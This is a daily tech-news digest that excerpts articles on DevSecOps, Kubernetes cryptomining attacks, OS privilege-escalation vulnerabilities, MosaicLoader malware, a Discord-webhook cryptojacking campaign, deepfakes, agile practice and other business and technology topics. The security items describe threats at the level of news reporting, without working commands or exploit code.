Many organizations have shifted security left, or at least started on their journey, in an effort to improve development velocity while also managing security risks. When starting with their incumbent tools, many organizations find it difficult to cobble together a variety of different security scanners and to integrate them into a complex DevOps toolchain. We hear from customers that siloed tooling has hindered collaboration. Many of our customers turned to GitLab to simplify their DevSecOps process. GitLab is often at the forefront of the DevSecOps and "shift security left" conversations among developers and businesses because of the simplicity and effectiveness of embracing security capabilities via a single platform. Developers need to find and fix vulnerabilities within their natural workflow earlier, without friction or distractions, while businesses must protect their IP in an age when the stakes of security have never been higher. When security capabilities are embedded into the end-to-end software processes, then developers can spend time writing code instead of managing tools.
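As an illustration of what "embedded" security capabilities can look like in practice, GitLab's bundled scanners are enabled by including CI templates in a project's pipeline definition rather than by wiring up separate tools. This fragment is a minimal sketch; exact template names, defaults, and scanner availability vary by GitLab version and license tier.

```yaml
# .gitlab-ci.yml -- add GitLab's bundled scanners to an existing pipeline
include:
  - template: Security/SAST.gitlab-ci.yml
  - template: Security/Secret-Detection.gitlab-ci.yml
  - template: Security/Dependency-Scanning.gitlab-ci.yml

stages:
  - build
  - test   # the scanner jobs attach to the test stage by default
```

Findings then surface in the same merge-request workflow developers already use, which is the "without friction or distractions" point made above.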


Kubernetes Cloud Clusters Face Cyberattacks via Argo Workflows

Researchers said the misconfigurations can also expose sensitive information such as code, credentials and private container-image names (which can be used to assist in other kinds of attacks). Intezer’s scan of the web found scads of unprotected instances, operated by companies in several industries, including technology, finance and logistics. “We have identified infected nodes and there is the potential for larger-scale attacks due to hundreds of misconfigured deployments,” according to Intezer. In one case, bad code was running on an exposed cluster for nine months before being discovered and removed. Attacks aren’t difficult to carry out: Researchers observed several popular Monero-mining malware families being housed in containers located in repositories like Docker Hub, including Kannix and XMRig. Cybercriminals need only to pull one of those containers into Kubernetes via Argo or another avenue. For instance, Microsoft recently flagged a wave of miners infesting Kubernetes via the Kubeflow framework for running machine-learning workflows.


AI execs unpack call center automation boom

Purkayastha says that technological improvements over the past five years have set the stage for the wider adoption of automation in the call center. Superior automatic speech recognition and transcription are accelerating the velocity of deploying solutions, while knowledge graphs — knowledge bases with graph-structured data models — are extracting information pertinent to support agents. Beyond this, automation technologies now better understand the semantics of conversations and continuously learn, optimizing toward business KPIs. Of course, these systems require data to train, and accumulating the data — along with processing, normalizing, and cleaning it — can take time. Schebella says that it’s not unusual for 30, 60, or 90 days to elapse before a natural language processing model begins to perform satisfactorily. In the future, he expects data collection to become less of a problem as call automation technologies provide more real-time feedback — for example, indicating to a customer service agent whether they’re speaking too quickly or slowly. 


A Guide to Stress-Free Cybersecurity for Lean IT Security Teams

Today's cybersecurity landscape is enough to make any security team concerned. The rapid evolution and increased danger of attack tactics have put even the largest corporations and governments at heightened risk. If the most elite security teams can't prevent these attacks from happening, what can lean security teams look forward to? Surprisingly, leaner teams have a much greater chance than they think. It might seem counterintuitive, but recent history has shown that large numbers and huge budgets aren't the difference-makers they once were. Indeed, having the right strategy in place is a clear indicator of an organization's success today. A new guide by XDR provider Cynet looks to dispel the myth that bigger is always better and shows a smarter way forward for lean IT security teams. The new guide focuses on helping lean IT security teams plan strategies that can protect their organizations while reducing the level of stress they face. Thanks to the rise of cyber tools that help level the playing field, and to a new generation of security professionals, smaller teams can now defend their organizations just as effectively.


4 Patterns for Microservices Architecture in Couchbase

One of the key characteristics of microservices is their loose coupling, so that they can be developed, deployed, access-controlled and scaled on an individual basis. Loose coupling requires that the underlying database infrastructure supports isolating the data for the individual microservices. That could be either by running individual database instances per microservice or by controlling access to the relevant parts of the data. While traditional relational databases support isolation using database schemas, they are often difficult to scale, they lack the flexibility of a JSON data model, and most importantly, they become the single point of failure in case of an outage of your database infrastructure. This is an important aspect to consider when designing your microservice architecture, as an outage has severe consequences for all microservices sharing the same database. Couchbase is designed for microservices. It’s a highly scalable, resilient and distributed database. It offers great flexibility and provides multiple levels of isolation to support up to one thousand microservices in the same Couchbase cluster.


Moving OT to the cloud means accounting for a whole new host of security risks

In addition to using attacks that all cloud platforms are vulnerable to, Team82 said one of its approaches involves gaining unauthorized access to an operator account "using different methods." Again, these different methods are likely similar to other attacks used to steal credentials, like phishing, which has been on the rise as more organizations move to cloud-based models to enable remote work. Team82 detailed two different approaches to gaining access to OT networks and hardware: A top-down approach that involves gaining access to a privileged account and thus a cloud dashboard, and a bottom-up approach that starts by attacking an endpoint device like a PLC from which they can execute malicious remote code. Regardless of the method, the end result for the attacker is the same: Access to, and control of, an OT cloud management platform and the ability to disrupt devices and businesses. An attacker could stop a PLC program responsible for temperature regulation of the production line, or change centrifuge speeds as was the case with Stuxnet.


Why Going Digital Isn’t Enough to Meet the New Customer Experience (CX) Imperative

Traditional silos are directed by functional leaders—service, marketing, commerce—but customers expect a unified approach to CX. Building a customer-centered organization requires operational innovation, and existing models don’t scale. CDOs, CMOs, CIOs, and CxOs—supported by CEOs, CFOs, COOs, and board members—must build an alliance: a working group or steering committee that is responsible and accountable for centralized, unified, and collaborative customer understanding and engagement. Ultimately, a customer-centered organization needs a leader who is probably not the chief executive officer but a chief experience officer: an orchestrator with day-to-day leadership, accountability, and tireless focus on the personal touch in a reimagined analog, digital, and hybrid customer journey. Companies leading in CX are more than twice as likely to have a chief experience officer as those that have made less progress.


The role of tech in the future of keeping the workforce well post-pandemic

The bigger picture is that a ‘return to work’ doesn’t mean back to the office. It might not even mean remote working. The talk of the rise of the ‘third workplace’, where employees can work from wherever they choose, means that a modern-day workforce needs a completely mobile infrastructure. So what does this look like? Firstly, using an integrated company news feed as part of your communications platform allows remote workers to cut past the often-laborious task of checking their emails and get to the priorities of the day. While emails can be easily overlooked, a news feed that highlights urgent issues and offers real-time updates which remote workers can receive across different channels helps boost a culture of openness and inclusion. Having the tools to communicate health and safety updates results in transparency around important matters like the risk of transmission and the safety measures implemented. A key question for organisations post-pandemic has to be how they leverage tech beyond workforce optimisation.


Questions that help CISOs and boards have each other’s back

An accountability approach should dictate who takes ownership of what. The vice president of human resources is responsible for organizing vetting; the chief information officer must be held responsible for IT security; and the chief financial officer must have plans for combating many forms of fraud, which include strategies for combating phishing and business email compromise, scenarios for handling ransomware attacks and efforts to harden the tools and processes utilized by accounts payable. The deeper you follow the accountability way of thinking, the more inclusive your leadership must be when it comes to cybersecurity. This can’t be a lone-wolf operation. The purpose of a security team is to become an ally for your executive team, not to render it passive. A proper security leader must determine—and share with the CEO and the board of directors, if necessary—whether the responsible persons are up to their tasks and committed to reaching security objectives.



Quote for the day:

"Leaders know the importance of having someone in their lives who will unfailingly and fearlessly tell them the truth." -- Warren G. Bennis

Daily Tech Digest - July 21, 2021

Two-for-Tuesday vulnerabilities send Windows and Linux users scrambling

The world woke up on Tuesday to two new vulnerabilities—one in Windows and the other in Linux—that allow hackers with a toehold in a vulnerable system to bypass OS security restrictions and access sensitive resources. As operating systems and applications become harder to hack, successful attacks typically require two or more vulnerabilities. One vulnerability allows the attacker access to low-privileged OS resources, where code can be executed or sensitive data can be read. A second vulnerability elevates that code execution or file access to OS resources reserved for password storage or other sensitive operations. The value of so-called local privilege escalation vulnerabilities, accordingly, has increased in recent years. The Windows vulnerability came to light by accident on Monday when a researcher observed what he believed was a coding regression in a beta version of the upcoming Windows 11. The researcher found that the contents of the security account manager—the database that stores user accounts and security descriptors for users on the local computer—could be read by users with limited system privileges.


Establishing the right analytics-based maintenance strategy

Although predictive maintenance is often held up as a prime example of the value that IoT and advanced analytics can generate, in fact, any predictions in the real world are imperfect. Our research shows that some organizations, even with highly qualified AA teams, are unlikely to realize the desired impact. The AA algorithm employed may fail to predict a breakdown, giving a false negative, and in other cases can predict an event that would not have happened, giving a false positive. Although much effort is often put into minimizing false negatives, it is often the false positives that make predictive maintenance less viable. Make no mistake, predictive maintenance can be very valuable. In situations with very high cost or safety issues associated with a breakdown, such as the midair failure of a jet turbine, operators need the closest estimate possible of when a breakdown might occur. In addition, in cases in which failures are highly predictable and well-understood—and the chance of a false positive is therefore minimal or very low-cost—predictive maintenance is well worth the expense.
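The economics behind that claim are easy to sketch with hypothetical numbers. The example below compares two imaginary models: one with modest recall but few false alarms, and a "noisier" one whose extra false positives swamp the value of its slightly higher recall. Every figure is invented for illustration.

```python
def expected_cost(n_failures, recall, false_alarms, cost_missed, cost_inspection):
    """Expected annual cost of a predictive-maintenance policy.

    n_failures:   real breakdowns per year the model could catch
    recall:       fraction of real failures the model predicts in time
    false_alarms: predicted failures per year that would never have happened
    A caught failure is assumed to cost only a planned inspection visit.
    """
    missed = n_failures * (1 - recall)                  # false negatives
    inspections = n_failures * recall + false_alarms    # true + false positives
    return missed * cost_missed + inspections * cost_inspection

# Invented fleet: 10 real failures/year; an unplanned breakdown costs 50k,
# a planned inspection visit costs 2k.
good_model = expected_cost(10, recall=0.90, false_alarms=5,
                           cost_missed=50_000, cost_inspection=2_000)
noisy_model = expected_cost(10, recall=0.95, false_alarms=200,
                            cost_missed=50_000, cost_inspection=2_000)
print(round(good_model), round(noisy_model))
```

Despite the higher recall, the noisy model costs far more per year in this toy setup, which is the sense in which false positives, not false negatives, often decide whether predictive maintenance is viable.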


Politicization and stigmatization won’t solve cyber security concerns: Chinese Mission to the EU and embassies

Slamming the EU and NATO's allegations, spokesperson of the Chinese Mission to the EU said that the statements were not based on facts, but speculation and groundless accusations. He added that China has always been a firm defender of cyber security and has cracked down on cyber attacks launched within China or using Chinese cyber facilities. "For years, certain countries in the West have abused their technological advantages for massive and indiscriminate eavesdropping across the world, even on its close allies. At the same time, they have boasted themselves as the guardians of cyber security. They push around their allies to form small circles and repeatedly smear and attack other countries on cyber security issues," the Mission said. Such practices fully expose the West's hypocrisy, it added. The Mission said it will follow closely NATO's attempts to break its geographical constraints under the guise of cyber security to make false accusations against China. Over the years, China has been a major victim of cyber attacks. 


Old Agile vs New Agile

Agile 2 is new in that it aggregates the ideas of these new thinkers, and integrates these ideas into a cohesive system of thought, while adding missing pieces. Agile 2 interprets these many writings and translates them into a common and holistically integrated shared narrative. But what is that narrative? Agile 2 is complex because humans are complex. It is not a set of bumper sticker maxims asserted without supporting explanation and rationale. Agile 2 is nuanced and broad, and is published with the thought that went into it. But I will summarize it, to give you a sense. Agile 2 is defined by its Values and Principles. Most of those principles could be summarized as described here. Basically, Agile 2 says that extremes don’t usually work well, and that judgment is called for when applying any practice. It also emphasizes the critical importance of having the right kinds of leadership for each situation. Note that “kinds of leadership” is plural. Agile 2 favors emergent leadership and autonomy, but it views those as aspirations rather than assumptions, and includes the theory that senior leaders need to be intentional about the kinds of leadership needed within their organization ...


Google advances ‘invisible’ cloud security with intrusion detection, analytics and more

Google’s new Cloud IDS offering epitomizes that vision. Announced in preview today, Cloud IDS is said to be a cloud-native, managed intrusion detection system that enterprises can deploy in just a few clicks in order to protect themselves against malware, spyware, command-and-control attacks and other network-based threats, Potti said. Google worked closely with Palo Alto Networks Inc. to develop Cloud IDS. The system incorporates that company’s advanced threat detection technologies to detect malicious network activity with very low false positives. It’s essentially a managed version of Palo Alto’s threat detection services, available in Google Cloud, where scaling, availability and updates are all automated. Google Cloud IDS stands out for its flexibility, the company says. It can easily be integrated with third-party security information and event management and security orchestration, automation and response platforms, enabling users to both investigate and automatically respond to any alerts, Potti said. 


Advanced Technology Outcomes: Humans Vs. Machine Or Human With Machine?

There is no doubt that we humans have always benefited from machines, and that we have always had the power to turn them off when required. But now the situation has turned around. The growing issue is the vital role machines play, both as single units and collectively as infrastructure, which means humans no longer have the option to simply shut the machines off. In the health sector, too, machines are evolving at a rapid rate. Surgery is becoming robotized, medical diagnostics has become dependent on machines, and there are even automated machines manufacturing drugs. Pulling the plug would therefore have terrible consequences for thousands of people worldwide. Beyond all this, we use machines as extensions of ourselves, applying them as stronger, faster, and cheaper hands. Because of this, we still hold the advantage over machines, but it is on us to make sound decisions for the future. We engage with machines continuously: we use smartphones to find routes to a destination, to look up recipes, even to check our health, and the list keeps growing.


Bringing Your Factory to the Edge in 2021

Is your factory living in the dark ages? Are you constantly checking manual reports to see your production scores? Do you wish that you could check your factory health on your smart device from anywhere in the world? If so, you could benefit from taking your factory to the edge. ... Reading information directly from our fieldbus-connected devices works great for a retrofit if you are an end user and not a programmable logic controller (PLC) programmer, or if you do not have access to the controller in the system because the integrator did not provide source codes. You can use a number of protocol converters and commercially available edge connection devices to take your machine-level data to an edge platform with some basic education online. For a large number of users, this option will get their factory “talking” to them for minimal human or equipment capital. It will require only protocol conversion and an edge connector (which we will discuss in a moment) and the cloud setup of choice, which can be outsourced.
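As an illustrative sketch of the "protocol conversion plus edge connector" idea, the code below simulates polling raw fieldbus registers and normalizing them into a JSON payload an edge platform could ingest. The register map, scaling factors, and field names are all hypothetical; a real retrofit would use a protocol-converter device or a client library (such as pymodbus for Modbus) and a real transport like MQTT rather than an in-memory stand-in.

```python
import json
import time

def read_register(addr):
    """Stand-in for a fieldbus read (e.g. a Modbus holding register).
    A real deployment would call a protocol converter or client library here."""
    simulated = {0: 724, 1: 315}   # raw counts from hypothetical sensors
    return simulated[addr]

def to_edge_payload(machine_id):
    """Normalize raw register values into the units and field names
    the (hypothetical) edge platform expects."""
    return {
        "machine": machine_id,
        "ts": int(time.time()),
        "temperature_c": read_register(0) / 10.0,  # raw value is tenths of a degree
        "pressure_kpa": read_register(1),
    }

payload = to_edge_payload("press-01")
print(json.dumps(payload))
```

The conversion layer is deliberately thin: once machine-level data is expressed as timestamped JSON, any cloud or dashboard of choice can consume it, which is why this kind of retrofit needs so little human or equipment capital.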


MosaicLoader Malware Delivers Facebook Stealers, RATs

Once installed on a machine, the malware creates a complex chain of processes, according to Bitdefender. Its hallmark, researchers said, is a unique obfuscation technique that shuffles small code chunks around, resulting in an intricate, mosaic-like structure – hence the name. The first stage of the execution flow is the installation of a dropper, which mimics legitimate software: Most of the first-stage droppers that researchers analyzed have icons and “version information” that mirror those used for legitimate applications. In some cases, the dropper pretends to be a NVIDIA process, for instance. The dropper makes contact with the C2 (the URL of the C2 is hardcoded as a string), then downloads a .ZIP file into the %TEMP% folder that contains two files required for the second stage: appsetup.exe and prun.exe. These are extracted to an innocuous-sounding “PublicGaming” folder in the C: directory, while the dropper also launches several instances of PowerShell to add exclusions from Windows Defender for the folder and the specific file names.


The biggest remote communication challenges within organisations

Zooming back out to an organisational level, recent events have pushed leadership teams to fully embrace digital transformation. For many organisations, making remote work possible meant pulling together capabilities from a range of technology providers into something of a patchwork of solutions that didn’t necessarily behave well together but was necessary given the organisational shock felt initially. Recognising that remote working is going to be a significant and constant part of our working landscape, it is now time to think about how to make this tech stack work more effectively. In many cases, this will involve consolidation, ideally onto a single CRM platform, where the sharing of customer and prospect data between marketing, sales and customer service teams is seamless, and where the platform supports growth, instead of creating friction points. ... The effects of COVID-19 disrupted the working landscape profoundly last year, meaning that UK organisations have had to rethink their working strategies. It is vital that business leaders constantly keep in touch with their employees and support them when these changes are taking place.


Image encryption technique could keep photos safe on popular cloud photo services

Now researchers have created a way for mobile users to enjoy popular cloud photo services while protecting their photos. The system, dubbed Easy Secure Photos (ESP), encrypts photos uploaded to cloud services so that attackers – or the cloud services themselves – cannot decipher them. At the same time, users can visually browse and display these images as if they weren’t encrypted. “Even if your account is hacked, attackers can’t get your photos because they are encrypted,” said Jason Nieh, professor of computer science and co-director of the Software Systems Laboratory. ESP employs an image encryption algorithm whose resulting files can be compressed and still get recognized as images, albeit ones that look like black and white static to anyone except authorized users. In addition, ESP works for both lossy and lossless image formats such as JPEG and PNG, and is efficient enough for use on mobile devices. Encrypting each image results in three black-and-white files, each one encoding details about the original image’s red, green, or blue data.
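ESP's actual algorithm is more involved than this (notably, its output stays compressible and valid as JPEG/PNG), but the core idea of splitting an image into three independently encrypted channel files can be sketched in a few lines. The XOR keystream below is a toy stand-in for the real cipher, used here only to show that each channel remains a valid grayscale byte stream and that the transformation is reversible.

```python
import random

def split_channels(pixels):
    """Split RGB pixel tuples into three per-channel byte strings."""
    return [bytes(p[c] for p in pixels) for c in range(3)]

def xor_channel(data, key, channel):
    """Toy keyed XOR keystream -- NOT the ESP cipher, illustration only.
    Output values stay in 0-255, so each encrypted channel can still be
    stored and displayed as a static-looking black-and-white image."""
    rnd = random.Random(f"{key}-{channel}")
    return bytes(b ^ rnd.randrange(256) for b in data)

pixels = [(255, 0, 0), (0, 255, 0), (0, 0, 255), (128, 128, 128)]
channels = split_channels(pixels)
encrypted = [xor_channel(ch, "secret", i) for i, ch in enumerate(channels)]
# XOR is its own inverse, so applying the same keystream decrypts.
decrypted = [xor_channel(ch, "secret", i) for i, ch in enumerate(encrypted)]
restored = list(zip(*decrypted))
print(restored == pixels)
```

The three encrypted files correspond to the red, green, and blue data described above; only a holder of the key can recombine them into the original image.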



Quote for the day:

"Leaders can choose to grow and change, but generally the most powerful predictor of future performance is past behavior. Evaluate them realistically." -- Lee Ellis

Daily Tech Digest - July 20, 2021

3 Ways To Make Conversational AI Work For Your Organization

AI systems possess features unlike any mechanisms we use in human-human conversation. Consequently, you can use them in powerful ways to create conversations and experiences that go beyond what’s possible with people alone. Unlike humans, AI can be available around the clock -- whether to answer a question in the middle of the night or to support an asynchronous conversation that stretches over many days. In addition, machines have an absence of emotion and moral judgment that provides a distinct advantage in some situations. When the subject of a conversation is sensitive, interactions with AI can afford a degree of anonymity that some customers welcome. And when it comes to detecting patterns, AI excels at spotting fraud or breaches of regulatory requirements. AI stays vigilant for events that are about to happen and can proactively engage in anticipation, thereby creating a superior experience. And finally, AI is moving to a point where it can literally read your mind. ... Another point of tension is the potential for manipulation. Persuasive computing can change people’s attitudes or behaviors, while practices like hyper-nudging use data to influence people toward certain decisions.


Making transformation stick

Leaders must model the behaviors that will be required to sustain change. This can be done with literal acts and symbolic acts that communicate to rank-and-file employees the leaders’ commitment to the transformation. A study by the National Institute for Health Research in the UK highlights the importance of role modeling. The institute reviewed transformation programs in clinical settings and found that out of a variety of factors affecting the longevity of the transformation, senior and clinical leader role modeling was the highest predictor of sustainable change. The study defined role modeling as leaders being seen promoting and investing in the change. The transformation experience of one of our clients bears out this finding. The company recently adopted customer relationship management software that features a tool for gathering insights from client meetings. But using the tool requires the company’s client-facing employees to write up meeting notes, something many find tedious. So, the CEO of the business regularly uses the tool and sends notifications of his written reports to his executive team and their direct reports. This is a powerful example of role modeling.


How smarter data analysis can transform financial planning

Reliance on legacy spreadsheets is inefficient and causes a tremendous amount of overhead and friction for analysts – the opposite of what you want in a process that should be essential for every business. Many of the solutions to these problems involve moving away from Excel entirely, which also isn’t practical in many cases. Smaller businesses, in particular, may not have the time or manpower to migrate their data and the deep logic they’ve built into their Excel sheets to a new platform. “While the rest of the business world moves to powerful, cloud-based SaaS solutions driven by AI and automation, finance departments remain entrenched in Excel,” says Gurfinkel. “While it’s a powerful tool, it lacks modern features that could help drive better forecasting. The ideal solution is one that builds on Excel to leverage its strengths while minimising its weaknesses, rather than trying (and failing) to replace it.” “Automation” has nearly reached buzzword status at this point, but that doesn’t mean the advantages it offers aren’t real. Automation has the potential to transform nearly every facet of work – including financial planning.


Banking is broken. This small FinTech startup plans to fix it

The sheer breadth of banking services Modularbank covers is one of the company's key strengths, says Vene, who points out that competitors have often had to partner with third-party firms to provide the same services. She also believes that the decades of technology and banking experience under Modularbank's belt mean it can tackle complex use cases and customer demands more comfortably than some of its competitors. "To build highly configurable modules, you have to know the product side of finance well. It's not enough to have great technology and great engineers in your team if you don't know what the customer needs to configure in your products," says Vene. Security is another area where experience plays a critical role, and arguably nowhere is this more important than in finance. "We have been working in this field for so many years with highly regulated organizations, so it was normal for us to focus on liability and security from day one," says Vene. For instance, GDPR compliance has been designed into Modularbank's products from the beginning, she says. 


How We Tracked a Threat Group Running an Active Cryptojacking Campaign

After the attackers find and enter into a Linux device with inadequate SSH credentials, they deploy and execute the loader. In the current campaign, they use .93joshua, but they have a couple of others at their disposal: .purrple and .black. All of the loaders are obfuscated via shc. The loader gathers system information and relays it to the attacker using an HTTP POST to a Discord webhook. By using Discord, the threat actors circumvent the need to host their own command-and-control server, as webhooks are a means to post data to a Discord channel programmatically. The gathered data can also be conveniently viewed on a channel. Discord is increasingly popular among threat actors because of this functionality, as it involuntarily provides support for malware distribution (use of its CDN), command-and-control (webhooks), or creating communities centered around buying and selling malware source code and services (e.g. DDoS). The information gathered at this step lets the threat actor witness the effectiveness of their tools in infecting machines. The list of victims may also be collected to carry out potential post-exploitation steps.
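For defenders, it helps to know what this traffic looks like on the wire. The sketch below builds (but does not send) the kind of HTTP POST a loader would make to a webhook; the URL is a hypothetical placeholder, and the message content is invented. Detection teams can alert on outbound POSTs to discord.com/api/webhooks from servers that have no business using Discord.

```python
import json
from urllib.request import Request

# Hypothetical webhook URL -- a real one embeds a channel id and secret token.
WEBHOOK = "https://discord.com/api/webhooks/<id>/<token>"

def build_webhook_post(message):
    """Construct (without sending) the POST request used to relay data
    to a Discord channel via a webhook. The JSON body's "content" field
    is what appears as a message in the channel."""
    body = json.dumps({"content": message}).encode()
    return Request(WEBHOOK, data=body,
                   headers={"Content-Type": "application/json"},
                   method="POST")

req = build_webhook_post("hostname=db01 user=root cores=8")
print(req.get_method(), req.full_url)
```

Because the destination is a legitimate, widely allowed domain served over HTTPS, simple domain blocklists won't catch it; the useful signal is *which hosts* originate this traffic.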


New AI-Based Augmented Innovation Tool Promises to Transform Engineer Problem Solving

What will often happen is that, as you work through both the “Functional Concepts” and “Inventive Principles” lists, you begin to realize that you’ve omitted elements from your description, or that your description should go in a slightly different direction based on the results. While this makes the process somewhat iterative, each iteration is just as fast as the first. In fact, it’s faster because you no longer need to spend 10 minutes writing down your changes. Throughout the process there’s a workbook, similar to an electronic lab notebook, for jotting down your ideas. As you record ideas based on the AI’s recommendations, it offers to run a concept evaluation, telling you whether a concept is “marginally acceptable” or “good”, for example. You can use this evaluation to understand whether you have framed your problem and solution in a way that is unique or novel, or whether you should go back to the drawing board and keep iterating.


Unconventional Superconductor May Unlock New Ways To Build Quantum Computers

Scientists on the hunt for an unconventional kind of superconductor have produced the most compelling evidence to date that they’ve found one. In a pair of papers, researchers at the University of Maryland’s (UMD) Quantum Materials Center (QMC) and colleagues have shown that uranium ditelluride (or UTe2 for short) displays many of the hallmarks of a topological superconductor — a material that may unlock new ways to build quantum computers and other futuristic devices. “Nature can be wicked,” says Johnpierre Paglione, a professor of physics at UMD, the director of QMC and senior author on one of the papers. “There could be other reasons we’re seeing all this wacky stuff, but honestly, in my career, I’ve never seen anything like it.” All superconductors carry electrical currents without any resistance. It’s kind of their thing. The wiring behind your walls can’t rival this feat, which is one of many reasons that large coils of superconducting wires and not normal copper wires have been used in MRI machines and other scientific equipment for decades.


Combating deepfakes: How we can future-proof our biometric identities

Deepfakes are manipulated videos or other digital representations produced by sophisticated artificial intelligence (AI), yielding fabricated images and sounds that appear to be real. While video deepfakes are arguably the most common, audio deepfakes are also growing in popularity. ... Firstly, we must think about how biometric authentication works. Take voice biometrics as an example: a good fake voice (even just a good impersonator) can be enough to fool a human. However, voice biometric software is much better at identifying differences that the human ear either doesn’t discern or chooses to ignore, which means that voice biometric ID can help prevent fraud when identity is checked against the voice. Even so-called deepfakes produce a poor copy of someone’s voice when analyzed at the digital level; they make quite convincing cameos, especially when combined with video, but they remain poor imitations digitally. Beyond this, the ability of deepfakes to bypass biometrics-based solutions will ultimately depend on the type of liveness detection integrated into the solution.
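The point that software can quantify differences the ear glosses over can be illustrated with a toy verification check. This is a minimal sketch, not any vendor’s algorithm: it assumes a separate model has already turned each voice sample into a fixed-length embedding vector, and the 0.8 threshold is an arbitrary placeholder.

```python
import math


def cosine_similarity(a, b):
    """Cosine similarity between two equal-length embedding vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return dot / (norm_a * norm_b)


def verify_speaker(enrolled, probe, threshold=0.8):
    """Accept the probe only if it is close enough to the enrolled
    voiceprint; a fake that fools the ear can still fall short here."""
    return cosine_similarity(enrolled, probe) >= threshold


# Toy embeddings: a genuine repeat attempt vs. a digitally distant fake.
genuine = [0.9, 0.1, 0.4]
fake = [0.1, 0.9, -0.2]
```

In a real system the embeddings would come from a trained speaker model and the comparison would be paired with liveness detection, which is the layer the article identifies as decisive against deepfakes.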


Is EDR The Silver Bullet For Malware?

Absolute security isn’t possible, as we all know: our control framework is only as strong as its weakest link. In recent years, we’ve seen great strides in innovation surrounding virtualization tools. This new technology, while useful to organizations and users in general, has also given hackers more power to bypass traditional defenses. To prove this, I carried out a small exercise in which I aimed to evade an EDR solution using a virtualization tool. Virtualization has opened many doors for businesses hoping to scale up, but security controls haven’t scaled fast enough to secure these virtualized environments. We currently focus on deploying EDR solutions on physical endpoints because many people assume that anything running on a physical host will be protected from malicious activity. But virtualization tools create an opaque layer within which they manage their own environment, so any EDR solution running on the physical host won’t have visibility into the files and services running inside that virtualized image. I used this concept to bypass an EDR solution running on a physical host and simulate an attack on the network.


Moving into "Modern Test Leadership"

Test leaders can ignite passion in testers by finding ways to engage them: start a community of practice; share blogs, videos, and podcasts; or bring in external speakers to share their wisdom with the team. You may find that some testers start wanting to try new ways of testing or to learn new skills. The next step is to nurture that passion, point them in the right direction for their career, and let them run with it. ... The role of a test leader needs to change; gone are the days of a test manager being the sole point of contact from a quality perspective and handing out testing tasks to a team. With agile/DevOps becoming far more prominent, the role needs to evolve into that of a test coach: advocating good testing practices, helping to evolve the culture, and raising awareness of what testers can do and what good quality looks like. Test leaders need to be servant leaders and support their team to fulfil their potential. Being a test leader in the current world is a challenge, but you really can reap what you sow.



Quote for the day:

"Leadership should be born out of the understanding of the needs of those who would be affected by it." -- Marian Anderson